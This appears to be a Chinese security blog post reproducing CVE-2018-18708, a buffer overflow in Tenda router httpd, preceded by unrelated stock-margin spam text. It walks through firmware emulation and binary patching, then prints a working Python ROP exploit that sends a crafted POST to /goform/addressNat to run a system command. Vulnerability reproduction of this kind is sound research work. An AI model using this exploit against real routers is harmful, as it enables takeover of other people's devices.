配资炒股安全合法的有哪些公司 ,股票杠杆交易平台排名榜最新消息,杠杆交易倍数如何计算出来

在线炒股配资门户网-杠杆交易软件搜加杠网-【东方资本】,股票杠杆app,今日热股什么意思,预计下周一股市行情展望

熱門閱讀

以“AI+數(shù)據(jù)安全”領(lǐng)雁！祝賀美創(chuàng)牽頭項(xiàng)目入選浙江省科技廳“尖兵領(lǐng)雁”計(jì)劃！

2025-12-22

美創(chuàng)AI災(zāi)備專家：引領(lǐng)災(zāi)備領(lǐng)域邁入“智能化”時代

2025-12-15

熱點(diǎn)觀察｜美創(chuàng)科技丁斐：數(shù)據(jù)安全 × 價值共創(chuàng)？可信數(shù)據(jù)空間的 “雙向奔赴”

2025-12-03

美創(chuàng)科技高校供應(yīng)鏈數(shù)據(jù)安全方案斬獲 2025 年度 “金智獎”

2025-12-03

每周安全速遞3?? | ShinyHunters 開發(fā)新型勒索軟件ShinySp1d3r

2025-11-21

相關(guān)文章

Strix自動滲透測試平臺搭建與使用

2025-12-22

每周安全速遞3?? | 勒索軟件攻擊導(dǎo)致心理健康機(jī)構(gòu)超11萬人數(shù)據(jù)泄露

2025-12-19

每周安全速遞3?? | 安卓勒索軟件DroidLock針對西班牙語言用戶進(jìn)行攻擊

2025-12-15

每周安全速遞3?? | 美國電信與汽車服務(wù)巨頭遭Cl0p勒索攻擊

2025-12-05

每周安全速遞3?? | ShinyHunters 開發(fā)新型勒索軟件ShinySp1d3r

2025-11-21

CVE-2018-18708：TENDA緩沖區(qū)溢出漏洞復(fù)現(xiàn)

發(fā)布時間：2023-04-14 閱讀次數(shù)： 1181 次

漏洞概述

CVE-2018-18708，多款Tenda產(chǎn)品中的httpd存在緩沖區(qū)溢出漏洞，在處理 post 請求的函數(shù)“fromAddressNat”的“page”參數(shù)時，該值直接在 sprintf 中用于放置在堆棧上的局部變量，這會覆蓋函數(shù)的返回地址，從而導(dǎo)致了緩沖區(qū)溢出漏洞。

以下產(chǎn)品和版本受到影響：Tenda AC7 V15.03.06.44_CN版本；AC9 V15.03.05.19(6318)_CN版本；AC10 V15.03.06.23_CN版本；AC15 V15.03.05.19_CN版本；AC18 V15.03.05.19(6318)_CN版本。

固件模擬

首先下載存在漏洞的固件，下載地址：

https://down.tenda.com.cn/uploadfile/AC15/US_AC15V1.0BR_V15.03.05.19_multi_TD01.zip

解壓固件

binwalk -Me US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin --run-as=root

解壓后在_US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin.extracted/目錄下存在squashfs-root文件系統(tǒng)

安裝qemu-user-static

sudo apt install qemu-user-static

接下來利用quem來調(diào)試

cp $(which qemu-arm-static) ./
sudo chroot . ./qemu-arm-static ./bin/httpd

此時會發(fā)現(xiàn)會一直卡在啟動界面

將/bin/httpd文件拖進(jìn)IDA中，使用alt+t組合鍵搜索“WeLoveLinux”關(guān)鍵字。如下圖所示，此處存在存在的check_network、ConnectCfm會進(jìn)行網(wǎng)絡(luò)連接確認(rèn)，需要對這兩個方法的返回值進(jìn)行patch才能繞過此處的判斷邏輯，否則將一直卡在啟動界面。

使用IDA插件keypatch進(jìn)行patch

https://github.com/keystone-engine/keypatchhttps://github.com/polymorf/findcrypt-yara
pip install keystone-enginepip install sixpip install yara-python

需將keypatch.py、findcrypt3.py、 findcrypt3.rules三個文件拷貝到IDA的plugin目錄

重啟IDA后，右鍵可以看到keypatch插件

接下來通過Keypatch->Patcher將check_network、ConnectCfm的MOV R3, R0都修改為MOV R3, #1

點(diǎn)擊Edit->Patch->Apply patches to input file，即可讓上面的patch生效。再將patch后的httpd文件替換掉原本的/bin/httpd文件，并賦予文件執(zhí)行權(quán)限。

繼續(xù)利用quem來調(diào)試

sudo chroot . ./qemu-arm-static ./bin/httpd

發(fā)現(xiàn)IP地址不對

建立一個虛擬網(wǎng)橋br0

brctl addbr br0ifconfig br0 192.168.1.1/24

拷貝web程序所需文件到/webroot/目錄

cp -rf ./webroot_ro/* ./webroot/

再次調(diào)試

chroot . ./qemu-arm-static ./bin/httpd

訪問http://192.168.1.1，成功搭建漏洞環(huán)境

漏洞利用

漏洞EXP如下：

import socket
import os
ｆｒｏｍ pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
ip = '192.168.1.1'
port = 80
r = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
li('[+] connecting')
r.connect((ip, port))
li('[+] connect finish')
rn = b'\r\n'
libc_base = 0x3fd9c000
system_addr = 0x005a270 + libc_base
pop_r3_pc = 0x00018298 + libc_base
mov_r0_sp_blx_r3 = 0x00040cb8 + libc_base
p1 = b'a' * 244 + b'a' * 4 +p32(pop_r3_pc) + p32(system_addr) +p32(mov_r0_sp_blx_r3) + b'id'
p2 = b'page=' + p1
p3 = b"POST /goform/addressNat" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn  
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=hum1qw" + rnp3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rnp3 += rn
p3 += p2
li('[+] sendling payload')
r.send(p3)
response = r.recv(4096)
response = response.decode()
li(response)

執(zhí)行EXP

可以看到模擬固件進(jìn)程已經(jīng)退出，并提示“段錯誤”，溢出漏洞復(fù)現(xiàn)成功。

上一條：每周安全速遞2??|攻擊者利用零日漏洞部署Nokoyawa勒索軟件
下一條：美創(chuàng)科技發(fā)布《2023年3月勒索病毒威脅報(bào)告》